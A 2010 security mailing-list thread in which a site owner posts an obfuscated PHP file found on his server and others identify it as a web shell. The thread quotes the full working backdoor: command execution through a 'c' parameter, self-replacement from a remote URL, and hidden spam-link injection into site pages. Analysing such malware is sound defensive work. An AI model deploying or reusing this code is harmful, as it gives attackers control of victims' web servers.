PaulDotCom mailing list archives

Previous By Date Next
Previous By Thread Next

Odd PHP file, trying to find out what it does

From: bradmcmahon at gmail.com (Bradley McMahon)
Date: Mon, 1 Mar 2010 12:03:05 -0500
here is the function system.

http://us.php.net/manual/en/function.system.php

looks like it could be pretty nasty.
-Brad




On Mon, Mar 1, 2010 at 11:29 AM, Andrew Ellis <only.samurai at gmail.com> wrote:

This is pretty heavily obscured (obviously), but the structure and
some of the things it's doing is reminiscent of PHP Shell, like C99.

Code like:
function Com()
{
? ?if (isset($_POST['c']))
? ? ?@system($_POST['c']);
?if (isset($_GET['c']))
? ? ? ?@system($_GET['c']);
}
Is used to pass things through the web-page to the server, allowing
the malicious user to control things more granularly.

I copied all the code you posted to a server and ran it through php at
the command line. If you add in something like $_POST['c'] = "ls >
test.txt" to the top of the file and run it, you'll find no output on
the page, but a nicely created test.txt file with the contents of the
directory containing this script...

Sad to say, looks like you were 0wned.



On Mon, Mar 1, 2010 at 3:16 AM, Adrian Crenshaw <irongeek at irongeek.com> wrote:

Ok, I think one of my sites may have been compromised. I found the following
PHP script on a site, but I'm not sure what it is trying to do. Anyone else
ever seen this script before?

Adrian

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
??? unlink("c");
??? unlink("1r");
? unlink("log");
}

function Clear2()
{
??? $mrd = trim(file_get_contents("m"));
??? $pt = "../$mrd";
??? $fin = file_get_contents($pt);
??? $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
? $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
??? $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
??? $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
??? $fin = ereg_replace("<!--dd4-->", "", $fin);
? $fin = ereg_replace("<!--dd5-->", "", $fin);
? $fin = ereg_replace("<font style=\"position: absolute;overflow:
hidden;height: 0;width: 0\">", "", $fin);
??? $fmrd = fopen($pt, "w+");
??? fwrite($fmrd, $fin);
??? fclose($fmrd);
??? echo " upt-ok";
}

function GetVar($name, &$var)
{
??? $var = "";
??? if (isset($_POST[$name]))
??? ??? $var = $_POST[$name];

? if (isset($_GET[$name]))
??? ??? $var = $_GET[$name];

??? if (($var) =="")
??? ? return? false;
??? ? else return true;
}

function Gen()
{
??? $alp = "abcdefghiklmnjsweqrtyuiopzx";
??? $maps = array();
??? if (isset($_POST["sg"]))
??? ??? $sg = $_POST["sg"];

? if (isset($_GET["sg"]))
??? ??? $sg = $_GET["sg"];

??? if (isset($_POST["gm"]))
???? ?$g = $_POST["gm"];

??? if (isset($_GET["gm"]))
??? ??? $g = $_GET["gm"];


??? $path = "";
??? $fr = fopen("1r", "a+");
??? if (file_exists("c"))
??? {
??? ??? $fconf = file("c");
??? ??? $tname = trim($fconf[0]);
??? ??? $cname = trim($fconf[1]);
??? ??? $curs = trim($fconf[2]);
??? ??? $pid = trim($fconf[3]);
??? ??? if ($pid == 100)
??? ??? {
??? ??? ??? $pid = 0;
??? ??? ??? $rnd = mt_rand(0, 999);
??? ??? ??? $nm = "";
??? ??? for ($i=0; $i<3; $i++)
??? ? ??? {
??? ??? ? ??? $ran = mt_rand(0,26);
??? ??? ? ??? $sym = $alp[$ran];
??? ??? ? ??? $nm = $nm.$sym;
??? ??? ? }
??? ??? ??? $cname = $nm;
??? ??? ??? mkdir("$tname/$cname");
??? ??? ??? $curs = $g;
??? ??? }
??? }
??? else
??? {
??? ??? $rnd = mt_rand(0, 999);
??? ??? $nm = "";
??? ? for ($i=0; $i<5; $i++)
??? ??? {
??? ??? ??? $ran = mt_rand(0,26);
??? ??? ??? $sym = $alp[$ran];
??? ??? ??? $nm = $nm.$sym;
??? ??? }
??? ??? $tname = $nm;
??? ??? $pid = 0;
??? ??? $curs = $g;
??? ??? mkdir($tname);
??? ??? $fht = fopen("$tname/.htaccess", "w+");
??? ??? $htname = $sg."2.txt";
??? ??? $fp = fopen($htname, "r");
??? ??? $fin = '';
??? ??? while (!feof($fp))
??? ??? {
??? ??? ??? ?$fc = fgets($fp, 1024);
??? ??? ??? ?if (!$fc) break;
??? ??? ?? $fin .= $fc;
??? ??? }
??? ??? fclose($fp);
??? ??? fwrite($fht, $fin);
??? ??? fclose($fht);
??? ??? $rnd = mt_rand(0, 999);
??? ??? $nm = "";
??? for ($i=0; $i<3; $i++)
? ??? {
??? ? ??? $ran = mt_rand(0,26);
??? ? ??? $sym = $alp[$ran];
??? ? ??? $nm = $nm.$sym;
??? ? }
??? ??? $cname = $nm;
??? mkdir("$tname/$cname");
??? }
? $gname = $sg."sgen.php";
??? for ($j=$pid; $j<$pid+10; $j++)
??? {
??? ??? $fp = fopen($gname."?g=$curs", "r");
??? ??? $fin = '';
??? ??? while (!feof($fp))
??? ??? {
??? ??? ??? ?$fc = fgets($fp, 1024);
??? ??? ??? ?if (!$fc) break;
??? ??? ?? $fin .= $fc;
??? ??? }
??? ??? fclose($fp);

??? ??? $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
??? ??? fwrite($fnd, $fin);
??? ??? fclose($fnd);
??? }

??? if ($j==100)
??? {
??? ? $fp = fopen($gname."?g=$curs&m=1", "r");
??? ??? $fin = '';
??? ??? while (!feof($fp))
??? ??? {
??? ??? ??? ?$fc = fgets($fp, 1024);
??? ??? ??? ?if (!$fc) break;
??? ??? ?? $fin .= $fc;
??? ??? }
??? ??? fclose($fp);
??? ??? $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
??? ??? fwrite($fnd, $fin);
??? ??? fclose($fnd);
??? ??? $map = "$path/$tname/$cname/$curs"."_lm.htm";
??? ??? fwrite($fr,"$map\n");
??? }

??? $fconf = fopen("c", "w+");
??? fwrite($fconf, $tname."\n");
??? fwrite($fconf, $cname."\n");
??? fwrite($fconf, $curs."\n");
??? $nj = $j;
??? fwrite($fconf, $nj."\n");
??? fclose($fconf);
}

function Update()
{
??? $thisname = "1.php";
??? if (isset($_POST['u']))
??? ? $u = $_POST['u'];

??? if (isset($_GET['u']))
???? ??? $u = $_GET['u'];

???? $fp = fopen($u, "r");
? $fin = '';
??? ??? while (!feof($fp))
??? ??? {
??? ??? ??? ?$fc = fgets($fp, 1024);
??? ??? ??? ?if (!$fc) break;
??? ??? ?? $fin .= $fc;
??? ??? }
? fclose($fp);

? $fthis = fopen($thisname, "w+");
? fwrite($fthis, $fin);
? fclose($fthis);
}

function Com()
{
??? if (isset($_POST['c']))
??? ? @system($_POST['c']);
? if (isset($_GET['c']))
??? ??? @system($_GET['c']);
}

function UpKos()
{
??? $mrd = trim(file_get_contents("m"));
??? $pt = "../$mrd";
??? $fin = file_get_contents($pt);
??? $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin);
??? $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin);
??? $fmrd = fopen($pt, "w+");
??? fwrite($fmrd, $fin);
??? fclose($fmrd);
}


function MRepl()
{
??? $mpt = "";
??? $drs = "";
??? $begtag = "<adsttnmq1><font style=\"position: absolute;overflow:
hidden;height: 0;width: 0\">";
? $endtag = "</font></body></html><sdioyslkjs2> ";
??? $mrd = trim(file_get_contents("m"));
??? $pt = "../$mrd";
??? $fin = file_get_contents($pt);
??? GetVar("mpt", $mpt);
??? ?// ??????? ??????????? ???? ????
? $fin = preg_replace ("/<\/body>/i", "", $fin);
? $fin = preg_replace ("/<\/html>/i", "", $fin);
? $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
? $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
??? $fp = fopen($mpt, "r");
? GetVar("drs", $drs);
? $fin = $fin.$begtag;
$drs = str_replace("\\", "", $drs);
? $fin = $fin.$drs;
? $fin = $fin.$endtag;
? $fmrd = fopen($pt, "w+");
??? fwrite($fmrd, $fin);
??? fclose($fmrd);
}

function Main()
{
??? if (isset($_POST['u']) || isset($_GET['u']))
??? {
??? ??? Update();
??? ??? exit();
??? }

??? if (isset($_POST['c']) || isset($_GET['c']))
??? {
??? ??? Com();
??? ??? exit();
??? }

??? ??? if (isset($_POST['uk']) || isset($_GET['uk']))
??? {
??? ??? UpKos();
??? ??? exit();
??? }

??? if (isset($_POST['g']) || isset($_GET['g']))
??? {
??? ??? Gen();
??? ??? exit();
??? }

??? if (isset($_POST['s']) || isset($_GET['s']))
??? {
??? ??? MRepl();
??? ??? exit();
??? }

? if (isset($_POST['cl']) || isset($_GET['cl']))
??? {
??? ??? Clear();
??? ??? exit();
??? }

??? if (isset($_POST['cl2']) || isset($_GET['cl2']))
??? {
??? ??? Clear2();
??? ??? exit();
??? }

??? echo "<ok>";

}

Main();

?>

_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com





--
Andrew Ellis
http://blog.psych0tik.net
_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
Previous By Date Next
Previous By Thread Next

Current thread: